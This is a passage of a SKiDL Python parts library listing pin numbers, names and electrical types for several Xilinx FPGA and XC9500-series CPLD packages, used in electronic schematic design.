Pin(num='AA19',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='AB19',name='IO_L13N_D10_2',func=Pin.BIDIR,do_erc=True),
Pin(num='A1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='E2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='J2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='U2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='V4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='B5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='G5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='C6',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='D6',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R6',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='V6',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='B7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='E7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='H7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='U7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='W7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='C8',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='J8',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='L8',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='N8',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='A9',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='H9',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='J9',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='K9',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='L9',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='M9',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='N9',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='P9',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='D10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='J10',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='K10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L10',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='M10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N10',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='P10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R10',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='V10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='A11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='B11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='E11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='F11',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='J11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='K11',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='L11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='M11',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='N11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='P11',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='U11',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='E21',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='J21',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N21',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='U21',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='AB1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='C12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='G12',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='J12',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='K12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L12',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='M12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N12',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='P12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R12',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='A22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='A13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='F13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='J13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='K13',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='L13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='M13',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='N13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='P13',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='C14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='E14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='J14',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='K14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L14',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='M14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N14',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='P14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R14',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='V14',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='B15',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='E15',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='H15',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='J15',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='K15',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='M15',name='VCCAUX',func=Pin.PWRIN,do_erc=True),
Pin(num='AA5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='C16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='D16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='W16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='B17',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='N17',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='G18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='L18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='R18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='W19',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='AA9',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='AB22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='AA13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='AA17',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='XC7336',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC95108PC84',dest=TEMPLATE,tool=SKIDL,ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='P1',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='P2',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='P3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='P4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='P5',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='P6',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='P7',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='I/O/GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='I/O/GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='P20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='TCK',do_erc=True),
Pin(num='40',name='P40',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='P50',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='70',name='P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='P80',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='P11',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='P21',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='P31',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='P51',func=Pin.BIDIR,do_erc=True),
Pin(num='61',name='P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='P81',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='I/O/GCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='32',name='P32',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='52',name='P52',func=Pin.BIDIR,do_erc=True),
Pin(num='62',name='P62',func=Pin.BIDIR,do_erc=True),
Pin(num='72',name='P72',func=Pin.BIDIR,do_erc=True),
Pin(num='82',name='P82',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='P13',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='P23',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='P33',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='P53',func=Pin.BIDIR,do_erc=True),
Pin(num='63',name='P63',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='83',name='P83',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='P24',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='P44',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='P54',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='74',name='I/O/GSR',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='P84',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='P25',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='P45',func=Pin.BIDIR,do_erc=True),
Pin(num='55',name='P55',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='P65',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='P75',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='P26',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='P36',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='P46',func=Pin.BIDIR,do_erc=True),
Pin(num='56',name='P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='P66',func=Pin.BIDIR,do_erc=True),
Pin(num='76',name='I/O/GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='37',name='P37',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='P47',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='P57',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='P67',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='I/O/GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='P18',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='TDI',do_erc=True),
Pin(num='38',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='P48',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='P19',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='TMS',do_erc=True),
Pin(num='39',name='P39',func=Pin.BIDIR,do_erc=True),
Pin(num='49',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='59',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='69',name='P69',func=Pin.BIDIR,do_erc=True),
Pin(num='79',name='P79',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC95108PQ100',dest=TEMPLATE,tool=SKIDL,ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='I/O/GSR',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='P3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='P4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='I/O/GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='I/O/GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='P8',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='P9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='P20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='P30',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='50',name='TCK',do_erc=True),
Pin(num='60',name='P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='P80',func=Pin.BIDIR,do_erc=True),
Pin(num='90',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='P11',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='P21',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='P31',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='P51',func=Pin.BIDIR,do_erc=True),
Pin(num='61',name='P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='81',name='P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='P91',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='P12',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='P22',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='P32',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='P42',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='P52',func=Pin.BIDIR,do_erc=True),
Pin(num='62',name='P62',func=Pin.BIDIR,do_erc=True),
Pin(num='72',name='P72',func=Pin.BIDIR,do_erc=True),
Pin(num='82',name='P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='P92',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='P13',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='33',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='43',name='P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='63',name='P63',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='P73',func=Pin.BIDIR,do_erc=True),
Pin(num='83',name='P83',func=Pin.BIDIR,do_erc=True),
Pin(num='93',name='P93',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='I/O/GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='P44',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='P54',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='74',name='P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='P84',func=Pin.BIDIR,do_erc=True),
Pin(num='94',name='P94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='I/O/GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='P45',func=Pin.BIDIR,do_erc=True),
Pin(num='55',name='P55',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='P65',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='P75',func=Pin.BIDIR,do_erc=True),
Pin(num='85',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='95',name='P95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='P26',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='P36',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='56',name='P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='P66',func=Pin.BIDIR,do_erc=True),
Pin(num='76',name='P76',func=Pin.BIDIR,do_erc=True),
Pin(num='86',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='96',name='P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='P27',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='P37',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='TDI',do_erc=True),
Pin(num='57',name='P57',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='P67',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='87',name='P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='P18',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='38',name='P38',func=Pin.BIDIR,do_erc=True),
Pin(num='48',name='P48',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='P78',func=Pin.BIDIR,do_erc=True),
Pin(num='88',name='P88',func=Pin.BIDIR,do_erc=True),
Pin(num='98',name='P98',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='P19',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='I/O/GCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='P39',func=Pin.BIDIR,do_erc=True),
Pin(num='49',name='TMS',do_erc=True),
Pin(num='59',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='69',name='P69',func=Pin.BIDIR,do_erc=True),
Pin(num='79',name='P79',func=Pin.BIDIR,do_erc=True),
Pin(num='89',name='P89',func=Pin.BIDIR,do_erc=True),
Pin(num='99',name='P99',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='XC95144PQ100',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC95144XL-TQ100',dest=TEMPLATE,tool=SKIDL,keywords='CPLD',description='CPLD, 144 macrocells, 3200 usable gates',ref_prefix='U',num_units=1,fplist=['TQFP*14x14mm*Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='I/O/GTS3',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='I/O/GTS4',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='I/O/GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='I/O/GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='P6',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='P7',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='P8',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='P9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='P20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='P30',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='P40',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='P50',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='P80',func=Pin.BIDIR,do_erc=True),
Pin(num='90',name='P90',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='P11',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='31',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='41',name='P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='61',name='P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='P91',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='P12',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='I/O/GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='P32',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='P42',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='P52',func=Pin.BIDIR,do_erc=True),
Pin(num='62',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='72',name='P72',func=Pin.BIDIR,do_erc=True),
Pin(num='82',name='P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='P92',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='P13',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='I/O/GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='P33',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='P53',func=Pin.BIDIR,do_erc=True),
Pin(num='63',name='P63',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='P73',func=Pin.BIDIR,do_erc=True),
Pin(num='83',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='93',name='P93',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='P24',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='54',name='P54',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='P64',func=Pin.BIDIR,do_erc=True),
Pin(num='74',name='P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='94',name='P94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='P25',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='TDI',do_erc=True),
Pin(num='55',name='P55',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='P65',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='85',name='P85',func=Pin.BIDIR,do_erc=True),
Pin(num='95',name='P95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='P36',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='P46',func=Pin.BIDIR,do_erc=True),
Pin(num='56',name='P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='P66',func=Pin.BIDIR,do_erc=True),
Pin(num='76',name='P76',func=Pin.BIDIR,do_erc=True),
Pin(num='86',name='P86',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='I/O/GCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='P37',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='TMS',do_erc=True),
Pin(num='57',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='67',name='P67',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='P77',func=Pin.BIDIR,do_erc=True),
Pin(num='87',name='P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='P18',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='P28',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='TCK',do_erc=True),
Pin(num='58',name='P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='P78',func=Pin.BIDIR,do_erc=True),
Pin(num='88',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='98',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='P19',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='P29',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='P39',func=Pin.BIDIR,do_erc=True),
Pin(num='49',name='P49',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='P59',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='79',name='P79',func=Pin.BIDIR,do_erc=True),
Pin(num='89',name='P89',func=Pin.BIDIR,do_erc=True),
Pin(num='99',name='I/O/GSR',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='XC95144XL-TQ144',dest=TEMPLATE,tool=SKIDL,keywords='CPLD',description='CPLD, 144 macrocells, 3200 usable gates',ref_prefix='U',num_units=1,fplist=['TQFP*20x20mm*Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='I/O/GTS3',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='I/O/GTS4',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='P4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='I/O/GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='I/O/GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='P7',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='P9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='P20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='I/O/GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='P40',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='P50',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='P80',func=Pin.BIDIR,do_erc=True),
Pin(num='90',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='P11',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='P21',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='P31',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='P51',func=Pin.BIDIR,do_erc=True),
Pin(num='61',name='P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='P91',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='P12',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='P22',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='I/O/GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='52',name='P52',func=Pin.BIDIR,do_erc=True),
Pin(num='62',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='72',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='82',name='P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='P92',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='P13',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='P23',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='P33',func=Pin.BIDIR,do_erc=True),
